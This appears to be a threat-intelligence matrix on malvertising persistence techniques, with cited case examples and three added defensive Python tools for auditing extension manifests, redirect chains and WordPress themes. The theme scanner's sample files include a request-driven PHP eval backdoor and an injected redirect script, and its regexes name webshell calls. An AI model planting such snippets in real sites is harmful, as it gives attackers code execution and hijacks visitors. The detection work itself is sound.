Malvertising Attack Matrix


[C300] Persistence

Tactic Description: Persistence is the stage where malvertisers establish a lasting foothold in the ad ecosystem, so that their campaigns run for as long as possible while evading detection mechanisms. This is typically achieved by hosting parts of the attack chain on reputable cloud storage services, backend-as-a-service platforms, or CDNs, which lets the attackers inherit the hosting provider's reputation and keep a low profile.

[C301] Cloud Storage - Bucket

Technique Description: Buckets are cloud storage containers that hold user data; websites and mobile apps commonly use them to store, back up and restore arbitrary amounts of data. In the Cloud Storage Bucket technique, malvertisers host their malicious script in misconfigured buckets on cloud services with a very good reputation. Because the script is served from the provider's own domain, it can execute and persist inside malvertising redirect chains while bypassing domain-reputation-based scanners: the reputation lookup sees the provider, not the tenant behind the bucket.

Procedure example: The malvertiser "ScamClub" bypassed iframe sandboxing while hosting its malicious script on Amazon S3.

References [Confiant] scamclub bypasses iframe sandboxing:

[C302] CDN reverse proxies

Technique Description: A reverse proxy is a server that sits in front of web servers and forwards client (e.g. web browser) requests to them. Reverse proxies are typically deployed to improve security, performance and reliability, and several reputable, trusted CDNs offer them as a service. The client's connection to a reverse-proxied origin is encrypted and terminates at the CDN edge, so the client only ever sees a CDN-fronted hostname and CDN IP space; that traffic is often trusted or allowed on the strength of the CDN's domain reputation, and the real origin server is never exposed. Malvertisers use CDN reverse proxies to hide their traffic and their origin infrastructure, which lets them persist in the redirect chain while staying under the radar.

Procedure example: eGobbler using commercial CDNs (namely Rackspace and Fastly) as one-time reverse proxies in front of its own infrastructure.

References [Confiant] Malvertising made in China:

[C303] Browser Extension

Technique Description: Malicious browser extensions give attackers persistence on victim devices: an extension sits as a component with access to, and visibility into, the entire browser stack (every tab, request and cookie its permissions cover). This lets the attacker operate outside the same-origin policy that constrains ordinary page scripts (extension code with host permissions is not subject to the CORS restrictions a page would face) and carry out further attacks automatically, such as credential theft or ad stuffing.

Procedure example: A group of Chrome extension creators built extensions that deliberately obfuscated their underlying advertising functionality from users. The extensions connected browser clients to a command-and-control infrastructure, exfiltrated private browsing data without the users' knowledge, exposed users to the risk of exploitation through the advertising streams they injected, and attempted to evade the Chrome Web Store's fraud detection mechanisms.

References [Duo] Security Researchers Partner With Chrome To Take Down Browser Extension Fraud Network Affecting Millions of Users:
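To make "access to the entire browser stack" concrete, the following Python is an added example (not code from the Malvertising Attack Matrix project or from the Duo Labs report) of a manifest audit that answers the question a reviewer asks first: which permission combinations let an extension rewrite ad traffic on every site, read every site's session cookies, or change its behaviour after review via remotely loaded code. The manifest is constructed, the risk rules and severities are the author's assumptions, and only the manifest keys themselves (permissions, host_permissions, content_scripts, content_security_policy) are real Chrome extension manifest keys.

```python
"""Audit a Chrome extension manifest for the permission footprint behind [C303].

Added example, not the Malvertising Attack Matrix project's code. Risk rules
are assumptions; manifest keys (permissions, host_permissions, content_scripts,
content_security_policy) are the real manifest keys.
"""
import json

# Match patterns that cover every origin (assumption: the common spellings)
BROAD_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions that let an extension observe or rewrite network requests
NETWORK_PERMS = {"webRequest", "webRequestBlocking", "declarativeNetRequest",
                 "declarativeNetRequestWithHostAccess"}


def host_patterns(manifest):
    """Collect every host match pattern, whether the manifest is MV2 (host
    patterns mixed into "permissions") or MV3 ("host_permissions"), plus the
    "matches" lists of content scripts."""
    patterns = set()
    for key in ("permissions", "host_permissions", "optional_host_permissions"):
        patterns.update(p for p in manifest.get(key, [])
                        if p == "<all_urls>" or "://" in p)
    for script in manifest.get("content_scripts", []):
        patterns.update(script.get("matches", []))
    return patterns


def _mv2_csp(manifest):
    # MV2 stores the CSP as one string; MV3 uses a dict, which this example skips
    csp = manifest.get("content_security_policy", "")
    return csp if isinstance(csp, str) else ""


def audit_manifest(manifest):
    """Return (severity, finding) pairs, highest severity first."""
    perms = set(manifest.get("permissions", []))
    patterns = host_patterns(manifest)
    broad = any(p in BROAD_PATTERNS for p in patterns)
    findings = []
    if broad and perms & NETWORK_PERMS:
        findings.append(("high", "broad host scope + request interception: "
                         "can inject or swap ads and redirect any page"))
    if broad and "cookies" in perms:
        findings.append(("high", "broad host scope + cookies: can read session "
                         "cookies for every site (session/credential theft)"))
    for script in manifest.get("content_scripts", []):
        if (script.get("run_at") == "document_start"
                and any(m in BROAD_PATTERNS for m in script.get("matches", []))):
            findings.append(("high", "content script runs on every page before "
                             "the page's own scripts"))
            break
    csp = _mv2_csp(manifest)
    if "unsafe-eval" in csp or ("script-src" in csp and "https:" in csp):
        findings.append(("medium", "MV2 CSP allows eval or a remote script source: "
                         "behaviour can change after store review (C2-driven)"))
    if broad:
        findings.append(("medium", "broad host scope: extension code reads "
                         "cross-origin responses a page's same-origin policy would block"))
    order = {"high": 0, "medium": 1}
    return sorted(findings, key=lambda f: order[f[0]])


# Constructed manifest in the shape of the extensions described above
# (assumption: the advertising purpose is hidden in the code; the permissions are not).
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 2,
  "name": "Page Speed Helper",
  "version": "1.0",
  "permissions": ["webRequest", "webRequestBlocking", "cookies", "tabs", "<all_urls>"],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"], "run_at": "document_start"}],
  "content_security_policy": "script-src 'self' 'unsafe-eval' https://updates.example-c2.test; object-src 'self'",
  "background": {"scripts": ["bg.js"]}
}""")


def sample_findings():
    return audit_manifest(SAMPLE_MANIFEST)


if __name__ == "__main__":
    for severity, text in sample_findings():
        print(f"[{severity}] {text}")
```

Run it against the manifests of every extension installed on a fleet (Chrome keeps them under the profile's Extensions directory) and triage anything that scores "high"; a legitimate ad blocker will also trip the interception rule, so the audit narrows the list rather than deciding it.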

[C304] Browser Notifications

Technique Description: Browser notifications, and web push notifications in particular, let sites send messages to users who have subscribed, including when the site is no longer open. Bad actors often use them to inflate site traffic for ad fraud, but they play a role in malvertising as well, since many bad actors try to maximize the return on their activity by combining tactics. For example, a malicious landing page may try to force a user to subscribe to push notifications at the same time that it initiates a drive-by download, so that the victim can keep being monetized afterwards in a persistent way.

Procedure example: The site browser-notification[.]site displayed a "Confirm notifications" message asking visitors to subscribe to notifications from the site. Once subscribed, users started receiving unwanted pop-up ads from it, even when the browser was closed.

References [malwaretips] Browser push notification abuse:

[C305] BackEnd as A Service

Technique Description: Backend as a Service platforms such as Firebase let developers build embeddable scripts and web applications that are hosted on Google infrastructure and served from Google-owned hostnames. Some attackers choose to host portions of their payload delivery flow on Firebase in order to piggyback on the reputation that comes with a Google endpoint.

Procedure example: VeryMal, a purveyor of the Shlayer macOS malware, renounced its steganography-based delivery in favor of hosting on Google Firebase, as malvertisers shifted tactics.

References [Confiant] VeryMal used Firebase as malvertisers shift:
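[C301] Cloud Storage - Bucket, [C302] CDN reverse proxies and [C305] BackEnd as A Service share one detection problem: the hop's hostname belongs to a reputable provider, so a domain-reputation lookup vouches for the provider rather than for the tenant. The following Python is an added example of a hop classifier for a redirect-chain log that serves all three techniques; it is not code from the Malvertising Attack Matrix project or from Confiant. The hostname patterns are assumptions drawn from the providers' documented default domains (S3, GCS and Azure Blob buckets, Fastly's and Rackspace's shared CDN hostnames, Firebase Hosting's default domains) and are illustrative rather than exhaustive, and the redirect chain is constructed, not captured from a real campaign.

```python
"""Flag redirect-chain hops served from multi-tenant provider hostnames.

Added example for the Malvertising Attack Matrix persistence tactic; not the
project's code. Hostname patterns are assumptions drawn from the providers'
documented default domains and are illustrative, not exhaustive.
"""
import re
from urllib.parse import urlparse

# Each pattern matches a hostname on which many unrelated tenants share a
# provider-owned domain, so the domain's reputation says nothing about the
# tenant behind it.
SHARED_TENANT_HOSTS = [
    # [C301] Cloud Storage - Bucket: virtual-hosted and path-style S3
    # (incl. regional, legacy "s3-region" and dualstack forms), GCS, Azure Blob
    (re.compile(r"(^|\.)s3(?:[.-][a-z0-9-]+)*\.amazonaws\.com$"), "aws-s3-bucket"),
    (re.compile(r"(^|\.)storage\.googleapis\.com$"), "gcs-bucket"),
    (re.compile(r"\.blob\.core\.windows\.net$"), "azure-blob"),
    # [C302] CDN reverse proxies: provider-issued shared hostnames
    (re.compile(r"\.global\.ssl\.fastly\.net$"), "fastly-shared"),
    (re.compile(r"\.rackcdn\.com$"), "rackspace-cdn"),
    # [C305] BackEnd as A Service: Firebase Hosting default domains
    (re.compile(r"\.(?:firebaseapp\.com|web\.app)$"), "firebase-hosting"),
]

SCRIPT_TYPES = {"application/javascript", "text/javascript",
                "application/x-javascript"}


def provider_for(url):
    """Return the shared-tenant provider label for a URL's host, or None."""
    host = (urlparse(url).hostname or "").lower()
    for pattern, label in SHARED_TENANT_HOSTS:
        if pattern.search(host):
            return label
    return None


def naive_reputation_key(host):
    """The registrable domain a simple reputation lookup would key on
    (assumption: last two labels, no public-suffix list)."""
    return ".".join(host.lower().split(".")[-2:])


def flag_chain(chain):
    """chain: ordered list of (url, content_type) hops. Returns one finding
    per hop whose hostname inherits a provider's reputation."""
    findings = []
    for hop, (url, content_type) in enumerate(chain):
        label = provider_for(url)
        if label is None:
            continue
        host = urlparse(url).hostname
        mime = (content_type or "").split(";")[0].strip().lower()
        findings.append({
            "hop": hop,
            "host": host,
            "provider": label,
            # what a domain-reputation scanner actually scores for this hop
            "reputation_key": naive_reputation_key(host),
            # a script served from the shared host is the case [C301] describes
            "serves_script": mime in SCRIPT_TYPES
            or urlparse(url).path.lower().endswith(".js"),
        })
    return findings


# Constructed sample chain (not from a real campaign): the creative loads a
# script from an S3 bucket, is bounced through a shared Fastly hostname, and
# lands on a Firebase-hosted page.
SAMPLE_CHAIN = [
    ("https://cdn.example-ssp.test/creative/123.html", "text/html"),
    ("https://assets-backup-7f3a.s3.us-east-1.amazonaws.com/load.js",
     "application/javascript; charset=utf-8"),
    ("https://prod-edge.global.ssl.fastly.net/r?c=123", "text/html"),
    ("https://promo-demo-1a2b.web.app/index.html", "text/html"),
]


def suspicious_hops(chain=SAMPLE_CHAIN):
    """Findings for a chain, script-serving hops first, then in chain order."""
    return sorted(flag_chain(chain),
                  key=lambda f: (not f["serves_script"], f["hop"]))


if __name__ == "__main__":
    for finding in suspicious_hops():
        print(finding)
```

Treat a hit as a signal, not a verdict: legitimate creatives load from these hosts constantly. The useful feature is the combination of a shared-tenant host, a script response and a position inside a redirect chain, and the reputation_key field makes explicit why a domain-reputation scanner passes the hop: it scores amazonaws.com, fastly.net or web.app, never the tenant.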

[C306] Compromised websites

Technique Description: Compromised websites can be used to host malicious JavaScript that executes as part of a malvertising redirect chain. Threat actors exploit 0-day or n-day vulnerabilities (typically in the site's CMS, themes or plugins) to compromise the site and plant their code in a way that persists across page loads and content updates.

Procedure example: A threat actor injected malicious JavaScript that redirects visitors to malvertising sites and, when an administrator is logged in, abuses the administrator's session to insert a backdoor into the WordPress theme's header. The injection was achieved by exploiting multiple WordPress vulnerabilities.

References [WordFence] Nearly a Million WP Sites Targeted in Large-Scale Attacks:
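As an added check for the [C306] procedure above (example code, not Wordfence's or the Malvertising Attack Matrix project's): a small scanner that walks theme files looking for the two artifacts that procedure leaves behind, an injected script that redirects visitors and a PHP backdoor planted in the theme. The sample theme files, the allowed-host list and the indicator regexes are constructed assumptions for this example; the indicators are generic webshell and redirect patterns, not signatures taken from the Wordfence report.

```python
"""Scan WordPress theme files for injected redirect scripts and PHP backdoors.

Added example for [C306]; not Wordfence's or the project's code. Indicator
regexes, the allowed-host list and the sample files are constructed.
"""
import re
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts from (assumption for the sample)
ALLOWED_HOSTS = {"cdn.example-site.test", "www.example-site.test"}

# <script ... src="..."> with an absolute or protocol-relative URL
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?((?:https?:)?//[^\"'\s>]+)", re.I)

# Generic indicators (assumption: illustrative, tune per environment)
INDICATORS = [
    ("inline_redirect", re.compile(
        r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*[\"']https?://", re.I)),
    ("php_eval_decode", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("php_request_exec", re.compile(
        r"\b(?:eval|assert|system|passthru|shell_exec|exec)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("php_request_write", re.compile(
        r"\bfile_put_contents\s*\([^;]*\$_(?:GET|POST|REQUEST)\b", re.I)),
]


def scan_file(path, content, allowed_hosts=ALLOWED_HOSTS):
    """Findings for one file: script hosts not on the allow list, plus any
    indicator hit, each with its line number."""
    findings = []
    for line_no, line in enumerate(content.splitlines(), 1):
        for match in SCRIPT_SRC.finditer(line):
            src = match.group(1)
            host = urlparse(src if "://" in src else "https:" + src).hostname
            if host and host.lower() not in allowed_hosts:
                findings.append({"file": path, "line": line_no,
                                 "kind": "external_script", "detail": host})
        for kind, pattern in INDICATORS:
            if pattern.search(line):
                findings.append({"file": path, "line": line_no,
                                 "kind": kind, "detail": line.strip()[:80]})
    return findings


def scan_theme(files, allowed_hosts=ALLOWED_HOSTS):
    """files: {path: content}. Findings across the whole theme, by path."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_file(path, files[path], allowed_hosts))
    return findings


# Constructed sample theme (not from a real compromise): header.php carries an
# injected redirect that spares logged-in users plus a foreign script tag, and
# functions.php has a request-driven eval backdoor appended.
SAMPLE_THEME = {
    "wp-content/themes/site/header.php": """<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<?php wp_head(); ?>
<script src="https://cdn.example-site.test/theme.js"></script>
<script>if(!document.cookie.match(/wp-settings/)){window.location="https://best-offer-zz9.test/go";}</script>
<script type="text/javascript" src="//track-stats-1a2b.test/stat.js"></script>
</head>
""",
    "wp-content/themes/site/functions.php": """<?php
add_action('wp_enqueue_scripts', 'site_scripts');
if (isset($_REQUEST['dc'])) { eval(base64_decode($_REQUEST['dc'])); }
""",
}


def sample_findings():
    return scan_theme(SAMPLE_THEME)


if __name__ == "__main__":
    for f in sample_findings():
        print(f"{f['file']}:{f['line']} {f['kind']}: {f['detail']}")
```

In a real incident, read the files from disk into the dict and run the scan alongside a diff against a clean copy of the theme from the vendor; the regexes catch the common obfuscation wrappers, but an attacker who inlines plain PHP into header.php will only show up in the diff.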

[C307] Fake Advertising Agency

Technique Description: A Fake Advertising Agency is an advertising agency owned by a malicious operator for the purpose of establishing relationships with ad-buying platforms (DSPs). The agency usually claims to have relationships with real brands, but these relationships are typically fabricated.

Procedure example: The Zirconium group created and operated 28 fake ad agencies to distribute malvertising campaigns throughout 2017, buying an estimated 1 billion ad views over the year and reaching 62% of ad-monetized websites on a weekly basis.

References [Confiant] Uncovering 2017's largest malvertising operation: